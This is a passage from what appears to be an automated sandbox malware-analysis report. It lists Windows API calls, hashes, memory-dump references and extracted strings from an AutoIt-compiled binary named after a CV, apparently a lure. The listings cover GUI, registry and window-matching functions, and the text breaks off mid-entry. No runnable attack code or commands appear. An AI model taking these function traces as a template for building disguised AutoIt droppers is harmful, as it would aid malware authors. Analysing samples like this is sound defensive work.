                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                        • String ID: ($0$tooltips_class32
                                                                                        • API String ID: 698492251-4156429822
                                                                                        • Opcode ID: 29ed96d80a14cd2f83ef7cfd36ff99e06aa75e04633b178c6f6d8f6feebcea08
                                                                                        • Instruction ID: 629923675ba31bdda484ecfd6839d3312d7fdd4e58d0bed893785eec9016cd30
                                                                                        • Opcode Fuzzy Hash: 29ed96d80a14cd2f83ef7cfd36ff99e06aa75e04633b178c6f6d8f6feebcea08
                                                                                        • Instruction Fuzzy Hash: 26B1BF71608350AFDB05DF65C949B6ABBE4FF88310F008A1DF599AB291DB70EC05CB96
                                                                                        APIs
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0039A939
                                                                                        • GetSystemMetrics.USER32(00000007), ref: 0039A941
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0039A96C
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 0039A974
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 0039A999
                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0039A9B6
                                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0039A9C6
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0039A9F9
                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0039AA0D
                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 0039AA2B
                                                                                        • GetStockObject.GDI32(00000011), ref: 0039AA47
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0039AA52
                                                                                          • Part of subcall function 0039B63C: GetCursorPos.USER32(000000FF), ref: 0039B64F
                                                                                          • Part of subcall function 0039B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0039B66C
                                                                                          • Part of subcall function 0039B63C: GetAsyncKeyState.USER32(00000001), ref: 0039B691
                                                                                          • Part of subcall function 0039B63C: GetAsyncKeyState.USER32(00000002), ref: 0039B69F
                                                                                        • SetTimer.USER32(00000000,00000000,00000028,0039AB87), ref: 0039AA79
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                        • String ID: AutoIt v3 GUI
                                                                                        • API String ID: 1458621304-248962490
                                                                                        • Opcode ID: 3e4ceffdf3f00f380042e88d856d34fbae2b2b3dd6ed228f196bac283930f6a6
                                                                                        • Instruction ID: fbdf045699d882dfb7297a57dc728a55cc7102341ddcb02a46316de4cbfb7060
                                                                                        • Opcode Fuzzy Hash: 3e4ceffdf3f00f380042e88d856d34fbae2b2b3dd6ed228f196bac283930f6a6
                                                                                        • Instruction Fuzzy Hash: B1B1AF71A0020AAFDF15DFA8DD49BAE7BB5FB08310F124229FA05A72A0DB74D840CF55
                                                                                        APIs
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E3735
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0041DC00,00000000,?,00000000,?,?), ref: 003E37A3
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003E37EB
                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003E3874
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 003E3B94
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003E3BA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                        • API String ID: 536824911-966354055
                                                                                        • Opcode ID: 040f3e5f43c4f7c013b52d0e2ef631272b28915402a4ae0c95082f223332d4a5
                                                                                        • Instruction ID: 41bd10e458033366036241b8862bbcea0744d68aa4e5961a52c75cf9a048c1eb
                                                                                        • Opcode Fuzzy Hash: 040f3e5f43c4f7c013b52d0e2ef631272b28915402a4ae0c95082f223332d4a5
                                                                                        • Instruction Fuzzy Hash: 37028A756047119FCB16EF25C885A2AB7E5FF88720F05859DF88A9B3A1CB30ED01CB85
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 003E6C56
                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003E6D16
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                        • API String ID: 3974292440-719923060
                                                                                        • Opcode ID: 23b9622aca6369ae3f25a3fa6986009ce30ceb6e190c3c89aef0ef306d59e3ad
                                                                                        • Instruction ID: 738bd2caea9a1af78331aef7d9f414acd7be99c28c53c780b4e52042b2d39bf5
                                                                                        • Opcode Fuzzy Hash: 23b9622aca6369ae3f25a3fa6986009ce30ceb6e190c3c89aef0ef306d59e3ad
                                                                                        • Instruction Fuzzy Hash: 31A170702043919BCB16EF21C952AABB3A5BF94354F144A6DF8A65F7D2DB30EC06CB41
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 003BCF91
                                                                                        • __swprintf.LIBCMT ref: 003BD032
                                                                                        • _wcscmp.LIBCMT ref: 003BD045
                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 003BD09A
                                                                                        • _wcscmp.LIBCMT ref: 003BD0D6
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 003BD10D
                                                                                        • GetDlgCtrlID.USER32(?), ref: 003BD15F
                                                                                        • GetWindowRect.USER32(?,?), ref: 003BD195
                                                                                        • GetParent.USER32(?), ref: 003BD1B3
                                                                                        • ScreenToClient.USER32(00000000), ref: 003BD1BA
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 003BD234
                                                                                        • _wcscmp.LIBCMT ref: 003BD248
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 003BD26E
                                                                                        • _wcscmp.LIBCMT ref: 003BD282
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                        • String ID: %s%u
                                                                                        • API String ID: 3119225716-679674701
                                                                                        • Opcode ID: 49288c2147cd6536641f10f8f17c111954c108adfbf788b5d6667fc50efca654
                                                                                        • Instruction ID: fcfa49eabfd4dbd53e84d8274a525bbe3fef6ef9896265cc997b446e485f5dcf
                                                                                        • Opcode Fuzzy Hash: 49288c2147cd6536641f10f8f17c111954c108adfbf788b5d6667fc50efca654
                                                                                        • Instruction Fuzzy Hash: E0A1F231604746AFD716DF64C884FEAB7A8FF44318F008929FA99D7590EB30E945CB91
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 003BD8EB
                                                                                        • _wcscmp.LIBCMT ref: 003BD8FC
                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 003BD924
                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 003BD941
                                                                                        • _wcscmp.LIBCMT ref: 003BD95F
                                                                                        • _wcsstr.LIBCMT ref: 003BD970
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 003BD9A8
                                                                                        • _wcscmp.LIBCMT ref: 003BD9B8
                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 003BD9DF
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 003BDA28
                                                                                        • _wcscmp.LIBCMT ref: 003BDA38
                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 003BDA60
                                                                                        • GetWindowRect.USER32(00000004,?), ref: 003BDAC9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                        • String ID: @$ThumbnailClass
                                                                                        • API String ID: 1788623398-1539354611
                                                                                        • Opcode ID: 8fec33f372702eaa7a69c64aa77ead3040d08f0d104eccc32985462ea4edd9b6
                                                                                        • Instruction ID: 1cc1654c7fbe7efc2a11ab29ced6f1c9d927efde71b499045e1d7c03057b97a6
                                                                                        • Opcode Fuzzy Hash: 8fec33f372702eaa7a69c64aa77ead3040d08f0d104eccc32985462ea4edd9b6
                                                                                        • Instruction Fuzzy Hash: 1D81C4310083059BDB06DF50C985FEA7BE8FF84718F05446AFE8A9A496EB34DD45CBA1
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                        • API String ID: 1038674560-1810252412
                                                                                        • Opcode ID: 8f8554615ad0937117da267620b65c5b442d3c7c18ab509f5b4561bec41ff2dc
                                                                                        • Instruction ID: 1c7c16292abf650c6c63a614355080913fd702d12a195b76de41c29f6c9684b0
                                                                                        • Opcode Fuzzy Hash: 8f8554615ad0937117da267620b65c5b442d3c7c18ab509f5b4561bec41ff2dc
                                                                                        • Instruction Fuzzy Hash: 1C31CF31644305AADB17FE20EE43FEDB3A89F24718F30106AF541B94D5FFA5AA04C615
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000063), ref: 003BEAB0
                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 003BEAC2
                                                                                        • SetWindowTextW.USER32(?,?), ref: 003BEAD9
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 003BEAEE
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 003BEAF4
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 003BEB04
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 003BEB0A
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 003BEB2B
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 003BEB45
                                                                                        • GetWindowRect.USER32(?,?), ref: 003BEB4E
                                                                                        • SetWindowTextW.USER32(?,?), ref: 003BEBB9
                                                                                        • GetDesktopWindow.USER32 ref: 003BEBBF
                                                                                        • GetWindowRect.USER32(00000000), ref: 003BEBC6
                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 003BEC12
                                                                                        • GetClientRect.USER32(?,?), ref: 003BEC1F
                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 003BEC44
                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 003BEC6F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                        • String ID:
                                                                                        • API String ID: 3869813825-0
                                                                                        • Opcode ID: bc0c2b691a9ab521a51497dbde944e710ed65413b4b64a18e920b59c905e53b6
                                                                                        • Instruction ID: 70fec8ba0b9004a34a438faf7a53ffd11a31c29266d4e34cc0e8c1bf2bbbaab6
                                                                                        • Opcode Fuzzy Hash: bc0c2b691a9ab521a51497dbde944e710ed65413b4b64a18e920b59c905e53b6
                                                                                        • Instruction Fuzzy Hash: 51515171900709EFDB21DFA8CE85FAEBBF5FF04708F014928E646A29A0C775A944CB14
                                                                                        APIs
                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 003D79C6
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 003D79D1
                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 003D79DC
                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 003D79E7
                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 003D79F2
                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 003D79FD
                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 003D7A08
                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 003D7A13
                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 003D7A1E
                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 003D7A29
                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 003D7A34
                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 003D7A3F
                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 003D7A4A
                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 003D7A55
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 003D7A60
                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 003D7A6B
                                                                                        • GetCursorInfo.USER32(?), ref: 003D7A7B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load$Info
                                                                                        • String ID:
                                                                                        • API String ID: 2577412497-0
                                                                                        • Opcode ID: a51f28d937534fccafb9c47ab05a12d324e1b94382d2b9ec57a96d430ada8390
                                                                                        • Instruction ID: d486833e5745f0778f9381cb3f350b9194bc311000595d40f8d90f0e8cca9d4e
                                                                                        • Opcode Fuzzy Hash: a51f28d937534fccafb9c47ab05a12d324e1b94382d2b9ec57a96d430ada8390
                                                                                        • Instruction Fuzzy Hash: DF3103B1D4831A6ADB119FB69C8995FBFE8FF04750F50452BA50DE7280EA78A5008FA1
                                                                                        APIs
                                                                                          • Part of subcall function 0039E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0038C8B7,?,00002000,?,?,00000000,?,0038419E,?,?,?,0041DC00), ref: 0039E984
                                                                                          • Part of subcall function 0038660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003853B1,?,?,003861FF,?,00000000,00000001,00000000), ref: 0038662F
                                                                                        • __wsplitpath.LIBCMT ref: 0038C93E
                                                                                          • Part of subcall function 003A1DFC: __wsplitpath_helper.LIBCMT ref: 003A1E3C
                                                                                        • _wcscpy.LIBCMT ref: 0038C953
                                                                                        • _wcscat.LIBCMT ref: 0038C968
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0038C978
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0038CABE
                                                                                          • Part of subcall function 0038B337: _wcscpy.LIBCMT ref: 0038B36F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                        • API String ID: 2258743419-1018226102
                                                                                        • Opcode ID: 9c427cc4bdd927f46a1ab57a7ecc601d767b0d170e725b21f019f25b9a721b5a
                                                                                        • Instruction ID: bc4ba1cfc8aec815e8a91300927d6e4e866daf576a72c94acdd4fc2d3f1f3aba
                                                                                        • Opcode Fuzzy Hash: 9c427cc4bdd927f46a1ab57a7ecc601d767b0d170e725b21f019f25b9a721b5a
                                                                                        • Instruction Fuzzy Hash: 4612B1715083459FC726EF24C881AAFBBE4FF99314F00495EF5899B261DB30DA49CB62
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003ECEFB
                                                                                        • DestroyWindow.USER32(?,?), ref: 003ECF73
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003ECFF4
                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003ED016
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003ED025
                                                                                        • DestroyWindow.USER32(?), ref: 003ED042
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00380000,00000000), ref: 003ED075
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003ED094
                                                                                        • GetDesktopWindow.USER32 ref: 003ED0A9
                                                                                        • GetWindowRect.USER32(00000000), ref: 003ED0B0
                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003ED0C2
                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003ED0DA
                                                                                          • Part of subcall function 0039B526: GetWindowLongW.USER32(?,000000EB), ref: 0039B537
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                        • String ID: 0$tooltips_class32
                                                                                        • API String ID: 3877571568-3619404913
                                                                                        • Opcode ID: 20b3bcd0144c46641eab62a2e51422f015ea6baeba67fdba7e7cfa7a35ce8800
                                                                                        • Instruction ID: 2668fddf21cd2e5a667a963aa68a9c0d9fd0d6966e50f90031511544a0843520
                                                                                        • Opcode Fuzzy Hash: 20b3bcd0144c46641eab62a2e51422f015ea6baeba67fdba7e7cfa7a35ce8800
                                                                                        • Instruction Fuzzy Hash: F671DCB4140344AFDB22CF68CC85F6677E5EB89304F094629F985972E0C734EC46CB16
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 003EF37A
                                                                                          • Part of subcall function 003ED7DE: ClientToScreen.USER32(?,?), ref: 003ED807
                                                                                          • Part of subcall function 003ED7DE: GetWindowRect.USER32(?,?), ref: 003ED87D
                                                                                          • Part of subcall function 003ED7DE: PtInRect.USER32(?,?,003EED5A), ref: 003ED88D
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 003EF3E3
                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003EF3EE
                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003EF411
                                                                                        • _wcscat.LIBCMT ref: 003EF441
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003EF458
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 003EF471
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 003EF488
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 003EF4AA
                                                                                        • DragFinish.SHELL32(?), ref: 003EF4B1
                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003EF59C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                        • API String ID: 169749273-3440237614
                                                                                        • Opcode ID: ef8dd696fa6dc1f920e29cb62e40fd364c10d7ae4c7d485419f74c6af35949b5
                                                                                        • Instruction ID: da4a213885e33bf5a033e5bd6d0702d34f62779581255f74e807cf9c9cefc470
                                                                                        • Opcode Fuzzy Hash: ef8dd696fa6dc1f920e29cb62e40fd364c10d7ae4c7d485419f74c6af35949b5
                                                                                        • Instruction Fuzzy Hash: 32614B71508340AFC702EF65CC85E9FBBE8EF89710F104A2EF595A61A1DB70DA09CB56
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(00000000), ref: 003CAB3D
